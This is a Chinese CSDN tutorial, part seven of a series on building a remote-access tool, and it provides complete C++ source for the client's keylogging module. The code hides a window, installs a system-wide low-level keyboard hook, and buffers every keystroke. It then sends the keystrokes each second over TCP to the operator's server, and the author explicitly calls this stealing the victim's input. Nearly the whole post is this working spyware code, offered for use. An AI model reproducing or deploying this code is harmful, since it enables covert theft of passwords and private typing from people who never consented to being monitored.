从零开始做远控 第七篇 键盘监控

最新推荐文章于 2024-03-08 18:20:07 发布
最新推荐文章于 2024-03-08 18:20:07 发布
阅读量2.3k 收藏 2
点赞数 1
分类专栏: 远控 文章标签: win32 Qt 网络安全 c++ 远控
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sumkee911/article/details/53817725
版权

如果你从没看过这系列教程请点击:从零开始做远控 简介篇

键盘监控:
那么快就到来第七节了,这两节我会跟大家讲讲怎么实时窃取客户端的每一个键盘输入,然后发送到服务端。
这一节我们会先做客户端方面的编程。


KeyboardSpy类:
1.现在在客户端创建一个KeyboardSpy的类。
2.因为这里需要用到消息循环,所以我们要建立一个对话框类,但是把它隐藏好。
3.用到Hook技术监控系统的键盘输入。
4.发送窃取的数据给服务端。

代码

KeyboardSpy.h

/*
 *
 *  Author: sumkee911@gmail.com
 *  Date: 22-12-2016
 *  Brief: 从客户端窃取键盘输入数据,再发给服务端。
 *
 */

#ifndef KEYBOARDSPY_H
#define KEYBOARDSPY_H

#include "tcpsocket.h"
#include <windows.h>
#include <iostream>
#include <vector>

class KeyboardSpy
{
public:
    KeyboardSpy();
    ~KeyboardSpy();

    // 这个类的入口函数
    static void startKeyboardSpy(std::string domain, int port);

    // 因为要出里win32数据,
    static void createDialogByNewThread();
    static DWORD WINAPI threadProc(LPVOID args);
    static BOOL WINAPI keyboardSpyWndProc(HWND hWnd,UINT uiMsg, WPARAM wParam,LPARAM lParam);

    // 键盘数据结构
    typedef struct
    {
        int iCode;
        int iScanCode;
        int iFlags;
        int iTime;
        int iExtraInfo;
    } HookStruct;

    // 安装和移除键盘窃取器,钩子
    static HHOOK installKeyboardHook();
    static void uninstallKeyboardHook(HHOOK hHook);
    static LRESULT CALLBACK keyboardHookProc(int nCode,WPARAM wParam, LPARAM lParam);

    // 更新或删除,socket,缓冲区
    static void addSocket(TcpSocket *sock);
    static std::vector<TcpSocket*> getSockets();
    static void delSocket(TcpSocket *sock);
    static void addBuffer(char data);
    static void delBuffer();

    // 发送窃取的数据
    static void CALLBACK sendKeyboardData(HWND hWnd,UINT uiMsg,UINT uiTimer,DWORD dwTimer);
};

#endif // KEYBOARDSPY_H

KeyboardSpy.cpp

#include "keyboardspy.h"

// 互挤体,用来确保线程安全
static CRITICAL_SECTION gCs;
// 初始化类
static KeyboardSpy spy;
// 窗口句柄
static HWND hWnd = NULL;
// 键盘钩子句柄
static HHOOK gHHook = NULL;
// socket列表
static std::vector<TcpSocket*> gSockets;
// 键盘数据缓存区
static std::vector<char> gBuffer;

KeyboardSpy::KeyboardSpy()
{
    // 初始化互挤体
    InitializeCriticalSection(&gCs);

    // 创建一个对话框来处理win32事件
    createDialogByNewThread();
}

KeyboardSpy::~KeyboardSpy()
{
    if(hWnd) {
        // 关闭计时器
        KillTimer(hWnd, 0);

        // 删除socket
        const int max = gSockets.size();
        for (int i=0; i<max; ++i) {
            gSockets.at(i)->dissconnect();
            delete gSockets.at(i);
        }

        // 关闭窗口
        DestroyWindow(hWnd);

        // 移除键盘监控
        if (gHHook) {
            uninstallKeyboardHook(gHHook);
        }
    }

    // 删除互挤体
    DeleteCriticalSection(&gCs);
}

void KeyboardSpy::startKeyboardSpy(std::string domain, int port)
{
    TcpSocket *sock = new TcpSocket();
    if (!sock->connectTo(domain, port)) {
        // 释放socket
        delete sock;

        std::cout << "Failed to connect server for keyboard spy" << std::endl;
        std::fflush(stdout);
        return;
    }

    // 把socket加到列表,当有键盘数据就会调用socket
    addSocket(sock);

    // 输出信息
    std::cout << "Started keyboard spy success" << std::endl;
    std::fflush(stdout);
}

void KeyboardSpy::createDialogByNewThread()
{
     // 启动一个新线程来做监控
     HANDLE h = CreateThread(NULL,0,KeyboardSpy::threadProc,(LPVOID)NULL,0,NULL);
     if (!h) {
         std::cout << "Failed to create new thread" << std::endl;
         std::fflush(stdout);
     }
}

DWORD KeyboardSpy::threadProc(LPVOID)
{
    // 创建一个不可见的窗口来处理win32事件
    WORD tempMem[1024];
    LPDLGTEMPLATEA temp = (LPDLGTEMPLATEA)tempMem;
    temp->style=WS_CAPTION;  temp->dwExtendedStyle=0;
    temp->x=0; temp->y=0;
    temp->cx=0; temp->cy=0;

    int ret = DialogBoxIndirectParamA(NULL,temp, NULL, keyboardSpyWndProc,(LPARAM)NULL);
    if (ret == -1) {
        std::cout << "Failed to create dialog box for keyboard spy" << std::endl;
        std::fflush(stdout);
    }

    return true;
}

WINBOOL KeyboardSpy::keyboardSpyWndProc(HWND hWnd, UINT uiMsg, WPARAM , LPARAM )
{
    switch(uiMsg) {
    // 初始化监控
    case WM_INITDIALOG: {
        std::cout << "WM_INITDIALOG" << std::endl;
        std::fflush(stdout);

        // 定时发送窃取的数据
        const int time = 1000;  // 我这里设置1秒发送一次,你可以设置你自己想要的
        SetTimer(hWnd,0, time, sendKeyboardData);

        // 安装键盘钩子来截取系统的所有键盘输入
        gHHook = installKeyboardHook();
        if (!gHHook) {
            std::cout << "Failed to install keyboard hook" << std::endl;
            std::fflush(stdout);
        }

        break;
    }
    case WM_PAINT:
        // 隐藏窗口
        ShowWindow(hWnd,SW_HIDE);
        break;
    default:
        break;
    }

    return false;
}

HHOOK KeyboardSpy::installKeyboardHook()
{
    return SetWindowsHookExA(13, keyboardHookProc, GetModuleHandleA(NULL), 0);
}

void KeyboardSpy::uninstallKeyboardHook(HHOOK hHook)
{
    UnhookWindowsHookEx(hHook);
}

LRESULT KeyboardSpy::keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    if (wParam == WM_KEYDOWN) {
        HookStruct *hs = (HookStruct *)lParam;
        char data = hs->iCode;

        // 我这里只识别了常用的键盘,你如果想分析更多的话你可以自己重写这里,
        // 转换键盘虚拟码,你兴趣修改可以参考:http://www.cnblogs.com/del/archive/2007/12/07/987364.html。
        bool isCapital = GetKeyState(VK_CAPITAL);
        if (hs->iCode >= 'A' && hs->iCode <= 'Z' && !isCapital) {
            // 判断是否大写,如果不是就把原本大写的字符变小写
            data = data + 0x20;
        } else if (hs->iCode >= 0x60 && hs->iCode<= 0x69) {
            // 小键盘
            data = data - 0x30;
        } else {
            // 符号
            switch (hs->iCode) {
            case 106: data = '*'; break;
            case 107: data = '+'; break;
            case 109: data = '-';   break;
            case 110: data = '.'; break;
            case 111: data = '/'; break;
            case 186: data = ';'; break;
            case 187: data = '='; break;
            case 188: data = ','; break;
            case 189: data = '-'; break;
             case 190: data = '.'; break;
            case 191: data = '/'; break;
            case 192: data = '`'; break;
            case 219: data = '['; break;
            case 220: data = '\\'; break;
            case 221: data = ']'; break;
            case 222: data = '\''; break;
            }
        }

        // 把键盘数据加到缓冲区
        addBuffer(data);
    }

    return CallNextHookEx(gHHook,nCode,wParam,lParam);
}

void KeyboardSpy::addSocket(TcpSocket *sock)
{
    // 锁定函数,其他线程不能进来
    EnterCriticalSection(&gCs);

    gSockets.push_back(sock);

    // 解除函数锁定
    LeaveCriticalSection(&gCs);
}

std::vector<TcpSocket *> KeyboardSpy::getSockets()
{
    // 锁定函数,其他线程不能进来
    EnterCriticalSection(&gCs);

    std::vector<TcpSocket *> sockets = gSockets;

    // 解除函数锁定
    LeaveCriticalSection(&gCs);

    return sockets;
}

void KeyboardSpy::delSocket(TcpSocket *sock)
{
    // 锁定函数,其他线程不能进来
    EnterCriticalSection(&gCs);

    std::vector<TcpSocket*>::iterator iter = gSockets.begin();
    for (; iter!=gSockets.end(); ++iter) {
        if (*iter == sock) {
            gSockets.erase(iter);
            break;
        }
    }

    // 解除函数锁定
    LeaveCriticalSection(&gCs);
}

void KeyboardSpy::addBuffer(char data)
{
    gBuffer.push_back(data);
}

void KeyboardSpy::delBuffer()
{
    gBuffer.clear();
}

void KeyboardSpy::sendKeyboardData(HWND , UINT , UINT , DWORD )
{
    // 遍历所有已经连接的端口来发送键盘数据
    if (gBuffer.size() > 0) {
        std::vector<TcpSocket*> sockets = getSockets();
        int max = sockets.size();
        for (int i = 0; i<max; ++i) {
            TcpSocket *sock = sockets.at(i);

            if (!sock->sendData(gBuffer.data(), gBuffer.size())) {
                // 删除无效socket
                delSocket(sock);

                // 释放socket
                delete sock;

                // 输出信息
                std::cout << "Finished keyboard spy" << std::endl;
            }
        }

        // 清空缓冲区
        delBuffer();
    }
}


5.在客户端的ZeroClient类doKeyboardSpy作修改 
void ZeroClient::doKeyboardSpy(std::map<std::string, std::string> &args)
{
    // 开始键盘监控
    KeyboardSpy::startKeyboardSpy(mSock.mIp, atoi(args["PORT"].data()));
}



本节完整代码:
下载完整代码
sumkee911
关注
专栏目录
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
热门推荐
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
键盘输入监控
04-19
该软件是使用钩子拦截键盘输入,并把内容保存在C:\LogS.txt中,当然可以知道输入的密码了。
键盘监控程序
12-14
这是一款利用钩子技术实现键盘监控的程序代码,通过VC编译,实用。
键盘监控
WHACKW的专栏
11-04 1175
键盘监控 键盘监控,顾名思义是在应用软件在运行时,用户在设备上的一举一动都将被详细记录下来,更多的实在使用者毫无觉察的情况下 将屏幕内容以图片的形式、按键内容以文本文档的形式保存在指定的文件夹或发送到指定的邮箱。键盘监控,包括物理按键与软键盘监控,通常监控的事件有:点 击,长按,滑动等,这些时间在Android上表现出来的都是一系列的KeyEvent。 为了实现键盘监控,从
Keylogger - 监控你的键盘输入
最新发布
gitblog_00007的博客
03-08 904
Keylogger - 监控你的键盘输入 项目地址:https://gitcode.com/gh_mirrors/keylogg/keylogger Keylogger 是一个开源的项目,它可以监控你的键盘输入,并将数据记录到日志文件中。 功能介绍 Keylogger 可以监听你的计算机上的所有键盘输入事件,并将其存储在指定的日志文件中。你可以设置要监控的窗口标题,以便只对特定应用程序的输入进行监...
监测键盘输入
小猪爱拱地
12-18 809
当然需要使用 select函数。 #include #include #include #include #include #include #include #include int main(void) { int kbd_fd = open("/dev/input/event3", O_RDONLY); if(kbd_fd < 0) { printf("fai
Zero-远控--08
12-22
【描述】"从零开始远控教程(远程控制) 第八篇 键盘监控"揭示了这个教程的目标是帮助初学者理解并构建远程控制软件。键盘监控是远程控制中的一个重要组成部分,因为它可以让远程操作者看到用户在被控制设备上按键...
从零开始远控 第八篇 键盘监控
sumkee911‘s coding
12-22 1994
键盘监控: 第八节了,这节是写服务端接收客户端发过来的键盘数据,然后打印到窗口里,这样键盘监控就完成了。 效果图: KeyboardSpy类 1.首先我们要在ZeroServer项目中增加一个继承于QWidget的KeyboardSpy类,和屏幕监控那一节差不多,所以我直接放代码。 代码 KeyboardSpy.h /* * Author: s
从零开始远控 第六篇 屏幕监控
sumkee911‘s coding
12-21 5678
屏幕监控: 这一节我们是完成屏幕监控的最后一部分,就是在服务端里发送指令,然后从客户端不断获取屏幕截图数据,画到窗口上,形成实时监控。 晒下效果图: ScreenSpy类: 1.首先我们要在ZeroServer项目里创建一个基于QWidget的类。 2.启动新的服务端,专门监控屏幕. 3.定义数据包头,可以从上一节复制过来。 // 数据头 type
键盘监控
07-18
C++实现远程键盘监听
Windows电脑键盘输入监控
peng87yu123的博客
04-17 3226
一,程序作用 通过监听键盘的输入,用户只要用键盘输入,程序都能够监控并记录到本地电脑(D:\keyboard\ )。 二,安装程序 ①点击: 安装.bat ②重启电脑 三,键盘录入记录日志查看 进入到文件夹 D:\keyboard\, 查看想要看的当天记录数据。 https://pan.baidu.com/s/1pB7uYeovoC_QzfMzNuKQSg 提取码:pjzq ...
监控键盘状态
夏目三三
04-27 691
1.使用Masnory自动布局 //监控键盘 [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(keyBoardShow:) name:UIKeyboardWillShowNotification object:nil]; [[NSNotificationCenter def...
监控键盘输入
weixin_34190136的博客
04-03 214
using System; using System.Runtime.InteropServices; using System.Reflection; using System.Threading; using System.Windows.Forms; using System.Diagnostics; using System.Collections.Generic; na...
从零开始远控 第五篇 屏幕监控
sumkee911‘s coding
12-21 5297
屏幕监控: 我们来到进阶课程了,我们这一节主要是讲客户端的,我们将会编写从客户端截取屏幕,然后用JEPG压缩它,最后发给服务端,形成一个动态画面。 1.首先我们要下载个:jpeg压缩库,然后把它放到ZeroClient的目录,最后在.pro文件路加入库文件:LIBS += $${PWD}\jpeg\libjpeg.lib 2.在.pro文件路加入库文件:LIBS += -lgdi32,来使用
[网络安全自学篇] 九十三.《Windows黑客编程技术详解》之木马开机自启动技术(注册表、计划任务、系统服务)
杨秀璋的专栏
08-15 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第四篇文章主要介绍木马病毒自启动技术,包括注册表、快速启动目录、计划任务和系统服务,希望对您有所帮助。
电脑屏幕键盘监控
11-22
用了很多,不用花钱的,这个是最好的!后台运行,全面记录,开机自启
监听键盘
zzf0521的博客
07-03 248
//键盘显示监听 customized_edit.getViewTreeObserver().addOnGlobalLayoutListener(new ViewTreeObserver.OnGlobalLayoutListener(){ //当键盘弹出隐藏的时候会 调用此方法。 @Override public void onGlobalLayout() { ...
鼠标键盘实时监控
07-18
Windows钩子实现鼠标键盘监控,程序源码和示例,支持visualstudio2010以上版本,可直接运行exe程序
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值